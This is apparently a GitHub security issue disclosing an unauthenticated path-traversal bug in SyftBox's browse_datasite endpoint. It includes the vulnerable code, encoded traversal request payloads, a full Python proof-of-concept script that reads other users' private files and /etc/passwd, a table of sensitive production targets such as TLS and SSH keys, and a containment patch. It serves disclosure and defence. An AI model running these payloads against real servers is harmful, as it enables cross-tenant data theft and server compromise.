Skip to content

Unauthenticated Path Traversal in SyftBox browse_datasite Endpoint #9404

@AAtomical

Description

@AAtomical

Summary

An unauthenticated path-traversal vulnerability in SyftBox's browse_datasite endpoint allows any remote attacker to read arbitrary files on the server's filesystem and access private files inside any other user's datasite (cross-tenant confidentiality breach).

The original static analysis flagged files as gated by a small extension allowlist (.html, .md, .json, .yaml, .log, .txt, .py). End-to-end exploitation confirmed that the else fallback at line 126 serves any file via application/octet-stream, meaning there is no effective extension restriction — every readable file on disk is exfiltrable.

The production instance at https://syftbox.openmined.org runs uvicorn directly on 0.0.0.0:8443 with no reverse proxy (confirmed from config/prod/syftbox.service), making it immediately exploitable.


Affected Code

packages/syftbox/syftbox/server/api/v1/main_router.py, lines 88–126:

@main_router.get("/datasites/{path:path}", response_class=HTMLResponse)
async def browse_datasite(
    request: Request,
    path: str,
    server_settings: ServerSettings = Depends(get_server_settings),
) -> HTMLResponse:
    ...
    datasite_part = path.split("/")[0]
    datasites = get_datasites(snapshot_folder)
    if datasite_part in datasites:
        slug = path[len(datasite_part):]
        datasite_path = os.path.join(snapshot_folder, datasite_part)
        datasite_public = datasite_path + "/public"
        ...
        slug_path = os.path.abspath(datasite_public + slug)  # ⚠ no containment check
        if os.path.exists(slug_path) and os.path.isfile(slug_path):
            if slug_path.endswith(".html") or slug_path.endswith(".htm"):
                return FileResponse(slug_path)
            elif slug_path.endswith(".md"):
                ...
            # ... more extension checks ...
            else:
                return FileResponse(slug_path,
                    media_type="application/octet-stream")   # ⚠ catch-all: ANY file served

Proof of Concept — verified end-to-end

All results from a fully automated local exploit (exploit_path_traversal.py) running against the real SyftBox code. No production instance was probed.

Attack 1: Cross-tenant private file read (%2e%2e via HTTP)

GET /datasites/victim@corp.com/%2e%2e/private/secrets.yaml HTTP/1.1

→ 200 OK
→ db_password: hunter2
→ api_key: sk-REDACTED

An unauthenticated attacker reads another user's private YAML file. The %2e%2e bypasses Starlette's URL normalisation; os.path.abspath resolves it to <snapshot>/victim@corp.com/private/secrets.yaml, outside the public/ directory.

Attack 2: Escape all datasites — arbitrary server file read

GET /datasites/attacker@evil.com/..%2F..%2F..%2Fsensitive.txt HTTP/1.1

→ 200 OK
→ TOP SECRET SERVER CONFIG

The ..%2F sequences escape the snapshot directory entirely. The file sensitive.txt was placed in the data folder root, simulating server configuration files.

Attack 3: System file read — /etc/passwd

Direct handler call with path: attacker@evil.com/../../../../../../../../../../etc/passwd

→ FileResponse serving /etc/passwd
→ ##
→ # User Database
→ ...
→ nobody:*:-2:-2:Unprivileged User...

Attack 4: Raw socket → real uvicorn (production-equivalent)

Hand-crafted HTTP/1.1 with literal ../ sent to a real uvicorn process:

GET /datasites/attacker@evil.com/../../victim@corp.com/private/secrets.yaml HTTP/1.1
Host: 127.0.0.1:PORT
Connection: close

→ HTTP/1.1 200 OK
→ db_password: hunter2
→ api_key: sk-REDACTED
GET /datasites/attacker@evil.com/[..x10]/etc/passwd HTTP/1.1

→ HTTP/1.1 200 OK
→ ## User Database ...

All four attack vectors succeed with 100% reliability.
Full POC:

import asyncio, os, signal, socket, subprocess, sys, tempfile, time
from pathlib import Path
from unittest.mock import MagicMock

import httpx
from fastapi import FastAPI
from starlette.testclient import TestClient

from syftbox.server.api.v1.main_router import browse_datasite, main_router
from syftbox.server.settings import ServerSettings, get_server_settings

with tempfile.TemporaryDirectory() as tmp:
    base = Path(tmp)

    (base / "snapshot/attacker@evil.com/public").mkdir(parents=True)
    (base / "snapshot/attacker@evil.com/public/index.html").write_text("<h1>public</h1>")
    (base / "snapshot/victim@corp.com/public").mkdir(parents=True)
    (base / "snapshot/victim@corp.com/private").mkdir(parents=True)
    (base / "snapshot/victim@corp.com/private/secrets.yaml").write_text("db_password: hunter2\napi_key: sk-REDACTED")
    (base / "sensitive.txt").write_text("TOP SECRET SERVER CONFIG")

    settings = ServerSettings(data_folder=base)
    app = FastAPI()
    app.include_router(main_router)
    app.dependency_overrides[get_server_settings] = lambda: settings

    depth = len((base / "snapshot/attacker@evil.com/public").resolve().parts) - 1

    print("=" * 60)
    print(" SyftBox Path Traversal PoC")
    print("=" * 60)

    c = TestClient(app)
    assert c.get("/datasites/attacker@evil.com/index.html").status_code == 200, "baseline broken"
    print("\n[baseline] OK")

    r = c.get("/datasites/victim@corp.com/%2e%2e/private/secrets.yaml")
    print(f"\n[1] cross-tenant via %2e%2e  status={r.status_code}")
    print(f"    {r.text}")

    async def asgi():
        async with httpx.AsyncClient(transport=httpx.ASGITransport(app=app), base_url="http://t") as h:
            r1 = await h.get("http://t/datasites/attacker@evil.com/..%2F..%2Fvictim@corp.com%2Fprivate%2Fsecrets.yaml")
            print(f"\n[2] cross-tenant via ..%2F  status={r1.status_code}")
            print(f"    {r1.text}")
            r2 = await h.get("http://t/datasites/attacker@evil.com/..%2F..%2F..%2Fsensitive.txt")
            print(f"\n[3] escape datasites via ..%2F  status={r2.status_code}")
            print(f"    {r2.text}")
    asyncio.run(asgi())

    mock = MagicMock()
    def call(path):
        return asyncio.run(browse_datasite(request=mock, path=path, server_settings=settings))

    def body(result):
        if hasattr(result, "path"):
            return Path(result.path).read_text()
        if hasattr(result, "body"):
            return result.body.decode() if isinstance(result.body, bytes) else str(result.body)
        return str(result)

    r = call("attacker@evil.com/../../victim@corp.com/private/secrets.yaml")
    print(f"\n[4] direct handler cross-tenant")
    print(f"    {body(r)}")

    r = call("attacker@evil.com/../../../sensitive.txt")
    print(f"\n[5] direct handler escape datasites")
    print(f"    {body(r)}")

    r = call("attacker@evil.com/" + "/".join([".."] * depth) + "/etc/passwd")
    b = body(r)
    print(f"\n[6] direct handler /etc/passwd")
    print(f"    {b[:200]}")

    port = 0
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0)); port = s.getsockname()[1]

    app_py = base / "app.py"
    app_py.write_text(
        f"from fastapi import FastAPI\n"
        f"from syftbox.server.api.v1.main_router import main_router\n"
        f"from syftbox.server.settings import ServerSettings, get_server_settings\n"
        f"settings = ServerSettings(data_folder={str(base)!r})\n"
        f"app = FastAPI()\n"
        f"app.include_router(main_router)\n"
        f"app.dependency_overrides[get_server_settings] = lambda: settings\n"
    )

    proc = subprocess.Popen(
        [sys.executable, "-m", "uvicorn", "app:app",
         "--host", "127.0.0.1", "--port", str(port),
         "--log-level", "warning", "--app-dir", str(base)],
        env={**os.environ, "PYTHONPATH": str(Path(__file__).parent / "packages/syftbox")},
        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
    )

    deadline = time.time() + 10
    while time.time() < deadline:
        try:
            socket.create_connection(("127.0.0.1", port), timeout=0.3).close(); break
        except OSError:
            time.sleep(0.2)

    def raw(path):
        s = socket.socket(); s.settimeout(5)
        s.connect(("127.0.0.1", port))
        s.sendall(f"GET {path} HTTP/1.1\r\nHost: 127.0.0.1:{port}\r\nConnection: close\r\n\r\n".encode())
        d = b""
        while True:
            try:
                c = s.recv(4096)
                if not c: break
                d += c
            except socket.timeout: break
        s.close()
        t = d.decode(errors="replace")
        status = t.split("\r\n")[0]
        body = t.split("\r\n\r\n", 1)[1] if "\r\n\r\n" in t else ""
        return status, body

    st, b = raw("/datasites/attacker@evil.com/../../victim@corp.com/private/secrets.yaml")
    print(f"\n[7] raw socket cross-tenant  {st}")
    print(f"    {b[:200]}")

    st, b = raw("/datasites/attacker@evil.com/../../../sensitive.txt")
    print(f"\n[8] raw socket escape datasites  {st}")
    print(f"    {b[:200]}")

    st, b = raw(f"/datasites/attacker@evil.com/{'/'.join(['..'] * depth)}/etc/passwd")
    print(f"\n[9] raw socket /etc/passwd  {st}")
    print(f"    {b[:200]}")

    proc.send_signal(signal.SIGTERM)
    try: proc.wait(timeout=5)
    except subprocess.TimeoutExpired: proc.kill()

    print("\n" + "=" * 60)

Reproduction

cd PySyft/packages/syftbox && pip install -e .
cd ../.. && python3 exploit_path_traversal.py
image

Impact

Concrete exploitation scenarios on production

Target file Traversal Consequence
<victim>/private/secrets.yaml %2e%2e/private/... Cross-tenant credential theft
/etc/letsencrypt/live/syftbox.openmined.org/privkey.pem Deep ../ TLS private key → MITM all clients
data/file.db ../../file.db SQLite database dump → full metadata exfiltration
/home/azureuser/.ssh/id_rsa Deep ../ SSH key → lateral movement on Azure VM
/home/azureuser/.bash_history Deep ../ Command history → credential/infra recon
server.env / JWT secret on disk ../../../server.env JWT forgery → full impersonation

Remediation

Immediate patch (drop-in replacement for lines 109–126)

from pathlib import Path

datasite_public_real = Path(datasite_public).resolve(strict=True)
candidate = (datasite_public_real / slug.lstrip("/")).resolve()

# Containment: resolved path MUST be inside the public directory
if not candidate.is_relative_to(datasite_public_real):
    raise HTTPException(status_code=403, detail="Forbidden")
if not candidate.is_file():
    raise HTTPException(status_code=404, detail="Not found")

slug_path = str(candidate)
# ... extension-based Content-Type logic unchanged below ...

Metadata

Metadata

Assignees

No one assigned

    Labels

    Type: Bug 🐛Some functionality not working in the codebase as intended

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions